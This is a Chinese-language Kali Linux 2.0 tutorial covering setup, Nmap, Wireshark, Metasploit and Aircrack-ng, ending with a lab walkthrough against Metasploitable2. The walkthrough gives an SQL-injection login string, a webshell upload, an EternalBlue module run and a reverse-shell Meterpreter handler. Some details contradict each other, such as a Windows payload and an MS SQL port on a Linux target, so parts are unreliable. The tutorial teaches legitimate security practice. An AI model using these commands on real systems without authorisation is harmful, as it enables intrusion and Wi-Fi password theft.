Kali Linux 2.0 基础入门与实战指南
Kali Linux 2.0 是一款专为渗透测试、安全审计和数字取证设计的 Linux 发行版,基于 Debian 8(Jessie)开发,预装了数百款安全工具,本文将从系统安装、基础配置、核心工具使用及实战案例四个方面,为初学者提供一份结构清晰的教程。

系统安装与环境准备
硬件要求
Kali Linux 2.0 对硬件的最低要求如下:
- 处理器:1 GHz x86 处理器(推荐 64 位)
- 内存:至少 2 GB RAM(推荐 4 GB 以上)
- 硬盘空间:至少 20 GB 可用空间
- 显卡:支持标准 VGA 的显卡
安装方式
Kali Linux 2.0 支持多种安装方式,包括虚拟机(VMware、VirtualBox)、U 盘启动和硬盘安装,以 VirtualBox 为例:
- 下载 Kali Linux 2.0 的 ISO 镜像文件(64 位版本)。
- 在 VirtualBox 中创建虚拟机,分配内存和硬盘空间。
- 挂载 ISO 文件并启动虚拟机,按照提示完成分区、用户设置等步骤。
系统更新
安装完成后,首次启动需更新系统:
sudo apt update && sudo apt upgrade -y
基础配置与优化
网络配置
Kali 默认使用 DHCP 自动获取 IP,若需静态 IP,编辑 /etc/network/interfaces 文件:
auto eth0 iface eth0 inet static address 192.168.1.100 netmask 255.255.255.0 gateway 192.168.1.1
软件源更换
默认源速度较慢,可更换为国内镜像(如阿里云):
sudo cp /etc/apt/sources.list /etc/apt/sources.list.bak sudo nano /etc/apt/sources.list
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
保存后执行 sudo apt update。

常用工具安装
sudo apt install build-essential nmap wireshark metasploit-framework -y
核心安全工具实战
Nmap 端口扫描
Nmap 是网络探测和安全审计的必备工具。
- 基础扫描:
nmap -sS 192.168.1.1 # SYN 扫描(半开扫描)
- 详细扫描:
nmap -sV -O -p 1-1000 192.168.1.1 # 检测服务版本和操作系统
- 输出结果:
nmap -oN scan_results.txt 192.168.1.1 # 保存结果到文件
Wireshark 流量分析
Wireshark 是一款强大的网络协议分析工具。
- 捕获数据包:选择网卡后点击“开始捕获”。
- 过滤规则:在过滤框中输入
tcp.port == 80只显示 HTTP 流量。 - 导出数据:通过
文件 → 导出对象 → HTTP提取网页文件。
Metasploit 框架
Metasploit 是一款渗透测试平台,集成了漏洞利用、后门生成等功能。
- 启动 msfconsole:
msfconsole
- 搜索漏洞模块:
search ms17_010 # 搜索 EternalBlue 漏洞模块
- 使用模块:
use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.1.100 exploit
Aircrack-ng 无线安全测试
Aircrack-ng 用于 Wi-Fi 网络的安全评估。
- 启动监控模式:
airmon-ng start wlan0
- 扫描附近网络:
airodump-ng wlan0mon
- 捕获握手包:
airodump-ng --bssid [目标AP的MAC] -c [信道] -w capture wlan0mon
- 破解密码:
aircrack-ng -w [密码字典文件] capture-01.cap
实战案例:Web 渗透测试模拟
场景:模拟对靶机 Metasploitable2 的渗透测试。

信息收集
- 使用 Nmap 扫描靶机 IP(192.168.1.102)的开放端口和服务:
nmap -sV -p- 192.168.1.102
发现开放了 22(SSH)、80(HTTP)、1433(MS SQL)等端口。
Web 服务漏洞利用
- 访问
http://192.168.1.102,发现 DVWA 靶场。 - 使用 Burp Suite 拦截登录请求,尝试 SQL 注入:
username=admin' OR '1'='1 -- &password=anything
- 成功登录后,利用“File Upload”功能上传 Webshell。
权限提升
- 通过 Metasploit 的
exploit/multi/handler监听反向连接:set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.100 set LPORT 4444 exploit
- 在靶机上执行生成的木马文件,获得 Meterpreter 会话。
- 使用
getuid查看当前用户权限,通过post/multi/recon/local_exploit_suggester查找提权漏洞。
注意事项与最佳实践
- 合法性:仅对授权目标进行测试,未经授权的测试可能违法。
- 系统备份:建议在虚拟机中操作,避免影响主系统。
- 工具更新:定期更新工具库:
sudo apt update && sudo apt full-upgrade -y
- 学习资源:推荐官方文档(https://docs.kali.org)和《渗透测试实战指南》。
通过本文的教程,读者可掌握 Kali Linux 2.0 的基础操作和安全工具的使用方法,实际应用中需结合场景灵活调整策略,持续学习新的攻防技术。

















